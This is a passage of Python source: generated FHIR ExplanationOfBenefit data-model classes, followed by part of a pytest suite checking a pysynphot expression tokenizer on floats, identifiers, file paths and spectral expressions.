self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Insurance',
'child_variable': 'coverage'},
]
class ExplanationOfBenefit_Accident(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
date: Date of an accident which these services are addressing.
type: Type of accident: work, auto, etc.
locationAddress: Where the accident occurred.
locationReference: Where the accident occurred.
"""
__name__ = 'ExplanationOfBenefit_Accident'
def __init__(self, dict_values=None):
self.date = None
# type: str
self.type = None
# reference to CodeableConcept
self.locationAddress = None
# reference to Address
self.locationReference = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Address',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Accident',
'child_variable': 'locationAddress'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Accident',
'child_variable': 'locationReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Accident',
'child_variable': 'type'},
]
class ExplanationOfBenefit_Item(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: A service line number.
careTeamLinkId: Careteam applicable for this service or product line.
diagnosisLinkId: Diagnosis applicable for this service or product
line.
procedureLinkId: Procedures applicable for this service or product
line.
informationLinkId: Exceptions, special conditions and supporting
information applicable for this service or product line.
revenue: The type of revenue or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: If this is an actual service or product line, ie. not a
Group, then use code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI). If a
grouping item then use a group code to indicate the type of thing
being grouped eg. 'glasses' or 'compound'.
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
programCode: For programs which require reason codes for the inclusion,
covering, of this billed item under the program or sub-program.
servicedDate: The date or dates when the enclosed suite of services
were performed or completed.
servicedPeriod: The date or dates when the enclosed suite of services
were performed or completed.
locationCodeableConcept: Where the service was provided.
locationAddress: Where the service was provided.
locationReference: Where the service was provided.
quantity: The number of repetitions of a service or product.
unitPrice: If the item is a node then this is the fee for the product
or service, otherwise this is the total of the fees for the children
of the group.
factor: A real number that represents a multiplier used in determining
the overall value of services delivered and/or goods received. The
concept of a Factor allows for a discount or surcharge multiplier to
be applied to a monetary amount.
net: The quantity times the unit price for an additional service or
product or charge. For example, the formula: unit Quantity * unit
Price (Cost per Point) * factor Number * points = net Amount.
Quantity, factor and points are assumed to be 1 if not supplied.
udi: List of Unique Device Identifiers associated with this line item.
bodySite: Physical service site on the patient (limb, tooth, etc).
subSite: A region or surface of the site, eg. limb region or tooth
surface(s).
encounter: A billed item may include goods or services provided in
multiple encounters.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
detail: Second tier of goods and services.
"""
__name__ = 'ExplanationOfBenefit_Item'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.careTeamLinkId = None
# type: list
self.diagnosisLinkId = None
# type: list
self.procedureLinkId = None
# type: list
self.informationLinkId = None
# type: list
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.programCode = None
# type: list
# reference to CodeableConcept
self.servicedDate = None
# type: str
self.servicedPeriod = None
# reference to Period
self.locationCodeableConcept = None
# reference to CodeableConcept
self.locationAddress = None
# reference to Address
self.locationReference = None
# reference to Reference: identifier
self.quantity = None
# reference to Quantity
self.unitPrice = None
# reference to Money
self.factor = None
# type: int
self.net = None
# reference to Money
self.udi = None
# type: list
# reference to Reference: identifier
self.bodySite = None
# reference to CodeableConcept
self.subSite = None
# type: list
# reference to CodeableConcept
self.encounter = None
# type: list
# reference to Reference: identifier
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.detail = None
# type: list
# reference to ExplanationOfBenefit_Detail
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'unitPrice'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'subSite'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'net'},
{'parent_entity': 'ExplanationOfBenefit_Detail',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'detail'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'programCode'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'quantity'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'servicedPeriod'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'adjudication'},
{'parent_entity': 'Address',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'locationAddress'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'service'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'bodySite'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'modifier'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'locationCodeableConcept'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'encounter'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'category'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'locationReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'revenue'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'udi'},
]
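# Worked example of the 'net' arithmetic described in the Args above:
# net = quantity * unit price * factor * points, with each term defaulting to 1 when not
# supplied. Plain numbers are used here instead of FHIR Quantity/Money structures; this is
# purely illustrative and not part of the generated model.
def _example_item_net(quantity=1.0, unit_price=1.0, factor=1.0, points=1.0):
    return quantity * unit_price * factor * points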
class ExplanationOfBenefit_Adjudication(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
category: Code indicating: Co-Pay, deductible, eligible, benefit, tax,
etc.
reason: Adjudication reason such as limit reached.
amount: Monetary amount associated with the code.
value: A non-monetary value for example a percentage. Mutually
exclusive to the amount element above.
"""
__name__ = 'ExplanationOfBenefit_Adjudication'
def __init__(self, dict_values=None):
self.category = None
# reference to CodeableConcept
self.reason = None
# reference to CodeableConcept
self.amount = None
# reference to Money
self.value = None
# type: int
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Adjudication',
'child_variable': 'amount'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Adjudication',
'child_variable': 'category'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Adjudication',
'child_variable': 'reason'},
]
class ExplanationOfBenefit_Detail(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: A service line number.
type: The type of product or service.
revenue: The type of revenue or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: If this is an actual service or product line, ie. not a
Group, then use code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI). If a
grouping item then use a group code to indicate the type of thing
being grouped eg. 'glasses' or 'compound'.
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
programCode: For programs which require reason codes for the inclusion,
covering, of this billed item under the program or sub-program.
quantity: The number of repetitions of a service or product.
unitPrice: If the item is a node then this is the fee for the product
or service, otherwise this is the total of the fees for the children
of the group.
factor: A real number that represents a multiplier used in determining
the overall value of services delivered and/or goods received. The
concept of a Factor allows for a discount or surcharge multiplier to
be applied to a monetary amount.
net: The quantity times the unit price for an additional service or
product or charge. For example, the formula: unit Quantity * unit
Price (Cost per Point) * factor Number * points = net Amount.
Quantity, factor and points are assumed to be 1 if not supplied.
udi: List of Unique Device Identifiers associated with this line item.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
subDetail: Third tier of goods and services.
"""
__name__ = 'ExplanationOfBenefit_Detail'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.type = None
# reference to CodeableConcept
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.programCode = None
# type: list
# reference to CodeableConcept
self.quantity = None
# reference to Quantity
self.unitPrice = None
# reference to Money
self.factor = None
# type: int
self.net = None
# reference to Money
self.udi = None
# type: list
# reference to Reference: identifier
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.subDetail = None
# type: list
# reference to ExplanationOfBenefit_SubDetail
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'ExplanationOfBenefit_SubDetail',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'subDetail'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'adjudication'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'service'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'unitPrice'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'net'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'programCode'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'type'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'udi'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'revenue'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'quantity'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'category'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'modifier'},
]
class ExplanationOfBenefit_SubDetail(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: A service line number.
type: The type of product or service.
revenue: The type of revenue or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: A code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI).
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
programCode: For programs which require reason codes for the inclusion,
covering, of this billed item under the program or sub-program.
quantity: The number of repetitions of a service or product.
unitPrice: The fee for an additional service or product or charge.
factor: A real number that represents a multiplier used in determining
the overall value of services delivered and/or goods received. The
concept of a Factor allows for a discount or surcharge multiplier to
be applied to a monetary amount.
net: The quantity times the unit price for an additional service or
product or charge. For example, the formula: unit Quantity * unit
Price (Cost per Point) * factor Number * points = net Amount.
Quantity, factor and points are assumed to be 1 if not supplied.
udi: List of Unique Device Identifiers associated with this line item.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
"""
__name__ = 'ExplanationOfBenefit_SubDetail'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.type = None
# reference to CodeableConcept
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.programCode = None
# type: list
# reference to CodeableConcept
self.quantity = None
# reference to Quantity
self.unitPrice = None
# reference to Money
self.factor = None
# type: int
self.net = None
# reference to Money
self.udi = None
# type: list
# reference to Reference: identifier
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'net'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'programCode'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'unitPrice'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'modifier'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'udi'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'service'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'adjudication'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'revenue'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'quantity'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'type'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'category'},
]
class ExplanationOfBenefit_AddItem(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequenceLinkId: List of input service items which this service line is
intended to replace.
revenue: The type of revenue or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: If this is an actual service or product line, ie. not a
Group, then use code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI). If a
grouping item then use a group code to indicate the type of thing
being grouped eg. 'glasses' or 'compound'.
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
fee: The fee charged for the professional service or product.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
detail: The second tier service adjudications for payor added
services.
"""
__name__ = 'ExplanationOfBenefit_AddItem'
def __init__(self, dict_values=None):
self.sequenceLinkId = None
# type: list
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.fee = None
# reference to Money
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.detail = None
# type: list
# reference to ExplanationOfBenefit_Detail1
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'category'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'service'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'modifier'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'fee'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'revenue'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'adjudication'},
{'parent_entity': 'ExplanationOfBenefit_Detail1',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'detail'},
]
class ExplanationOfBenefit_Detail1(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
revenue: The type of revenue or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: A code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI).
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
fee: The fee charged for the professional service or product.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
"""
__name__ = 'ExplanationOfBenefit_Detail1'
def __init__(self, dict_values=None):
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.fee = None
# reference to Money
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'service'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'revenue'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'category'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'adjudication'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'fee'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'modifier'},
]
class ExplanationOfBenefit_Payment(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
type: Whether this represents partial or complete payment of the
claim.
adjustment: Adjustment to the payment of this transaction which is not
related to adjudication of this transaction.
adjustmentReason: Reason for the payment adjustment.
date: Estimated payment date.
amount: Payable less any payment adjustment.
identifier: Payment identifier.
"""
__name__ = 'ExplanationOfBenefit_Payment'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.adjustment = None
# reference to Money
self.adjustmentReason = None
# reference to CodeableConcept
self.date = None
# type: str
self.amount = None
# reference to Money
self.identifier = None
# reference to Identifier
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'adjustmentReason'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'identifier'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'adjustment'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'amount'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'type'},
]
class ExplanationOfBenefit_ProcessNote(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
number: An integer associated with each note which may be referred to
from each service line item.
type: The note purpose: Print/Display.
text: The note text.
language: The ISO-639-1 alpha 2 code in lower case for the language,
optionally followed by a hyphen and the ISO-3166-1 alpha 2 code for
the region in upper case; e.g. "en" for English, or "en-US" for
American English versus "en-EN" for England English.
"""
__name__ = 'ExplanationOfBenefit_ProcessNote'
def __init__(self, dict_values=None):
self.number = None
# type: int
self.type = None
# reference to CodeableConcept
self.text = None
# type: str
self.language = None
# reference to CodeableConcept
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_ProcessNote',
'child_variable': 'language'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_ProcessNote',
'child_variable': 'type'},
]
class ExplanationOfBenefit_BenefitBalance(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
category: Dental, Vision, Medical, Pharmacy, Rehab etc.
subCategory: Dental: basic, major, ortho; Vision exam, glasses,
contacts; etc.
excluded: True if the indicated class of service is excluded from the
plan; missing or False indicates the service is included in the
coverage.
name: A short name or tag for the benefit, for example MED01, or
DENT2.
description: A richer description of the benefit, for example 'DENT2
covers 100% of basic, 50% of major but excludes Ortho, Implants and
Cosmetic services'.
network: Network designation.
unit: Unit designation: individual or family.
term: The term or period of the values such as 'maximum lifetime
benefit' or 'maximum annual visits'.
financial: Benefits Used to date.
"""
__name__ = 'ExplanationOfBenefit_BenefitBalance'
def __init__(self, dict_values=None):
self.category = None
# reference to CodeableConcept
self.subCategory = None
# reference to CodeableConcept
self.excluded = None
# type: bool
self.name = None
# type: str
self.description = None
# type: str
self.network = None
# reference to CodeableConcept
self.unit = None
# reference to CodeableConcept
self.term = None
# reference to CodeableConcept
self.financial = None
# type: list
# reference to ExplanationOfBenefit_Financial
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'subCategory'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'term'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'category'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'unit'},
{'parent_entity': 'ExplanationOfBenefit_Financial',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'financial'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'network'},
]
class ExplanationOfBenefit_Financial(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
type: Deductible, visits, benefit amount.
allowedUnsignedInt: Benefits allowed.
allowedString: Benefits allowed.
allowedMoney: Benefits allowed.
usedUnsignedInt: Benefits used.
usedMoney: Benefits used.
"""
__name__ = 'ExplanationOfBenefit_Financial'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.allowedUnsignedInt = None
# type: int
self.allowedString = None
# type: str
self.allowedMoney = None
# reference to Money
self.usedUnsignedInt = None
# type: int
self.usedMoney = None
# reference to Money
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Financial',
'child_variable': 'type'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Financial',
'child_variable': 'allowedMoney'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Financial',
'child_variable': 'usedMoney'},
]
|
40570
|
from __future__ import absolute_import, division, print_function
import pytest
from ..spparser import Scanner
scanner = Scanner()
# Test of a single instance of each token. Does not test them in
# context, but at least it tests that each one is recognized.
tokens = [
# bug: the original pysynphot could not recognize integer
# ('INTEGER', '1'),
# basic float
('FLOAT', '.1'),
('FLOAT', '1.1'),
('FLOAT', '1.'),
('FLOAT', '1'),
# basic float with e+
('FLOAT', '.1e+1'),
('FLOAT', '1.1e+1'),
('FLOAT', '1.e+1'),
('FLOAT', '1e+1'),
# basic float with e-
('FLOAT', '.1e-1'),
('FLOAT', '1.1e-1'),
('FLOAT', '1.e-1'),
('FLOAT', '1e-1'),
# basic float with e
('FLOAT', '.1e1'),
('FLOAT', '1.1e1'),
('FLOAT', '1.e1'),
('FLOAT', '1e1'),
# identifier
('IDENTIFIER', 'xyzzy'),
('IDENTIFIER', 'xyzzy20'),
('IDENTIFIER', '20xyzzy'),
('IDENTIFIER', '20xyzzy20'),
# special characters
('LPAREN', '('),
('RPAREN', ')'),
(',', ','),
('/', ' / '),
# filename
('IDENTIFIER', '/a/b/c'),
('IDENTIFIER', 'foo$bar'),
('IDENTIFIER', 'a/b'),
# file list
('FILELIST', '@arf'),
('FILELIST', '@narf')]
def print_token_list(tklist):
s = 'Token list: {} items\n'.format(len(tklist))
for x in tklist:
s += '{:<20s} {}\n'.format(x.type, x.attr)
s += '---\n'
return s
def ptl2(tkl):
"""
Use this to generate the list of tokens in a form easy to copy/paste
into a test.
"""
s = ''
for x in tkl:
s += ' ( "{}", {} ), \n'.format(x.type, repr(x.attr))
s += '\n'
return s
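# Hypothetical helper (sketch) showing the intended workflow: tokenize an expression,
# format it with ptl2(), and paste the result into one of the expected-token lists below.
# The example expression is made up.
def _example_generate_expected(text='spec(vega.fits)'):
    return ptl2(scanner.tokenize(text))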
def stream_t(text, result):
"""
Parse a bit of text and compare it to the expected token stream.
Each actual test function calls this.
"""
tkl = scanner.tokenize(text)
msg = print_token_list(tkl)
assert result is not None, \
msg + 'NO EXPECT LIST\n [\n' + ptl2(tkl) + ' ]\n'
for n, (expect, actual) in enumerate(zip(result, tkl)):
assert expect[0] == actual.type and expect[1] == actual.attr, \
(msg + '{} expect={} actual=({}, {})'.format(
n, expect, actual.type, actual.attr))
@pytest.mark.parametrize(
('text', 'result'),
[('spec($PYSYN_CDBS//calspec/gd71_mod_005.fits)',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', '$PYSYN_CDBS//calspec/gd71_mod_005.fits'),
('RPAREN', None)]),
(('spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),'
'band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+'
'spec(el1302a.fits)+spec(el1356a.fits)+'
'spec(el2471a.fits))*0.5'),
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('+', None),
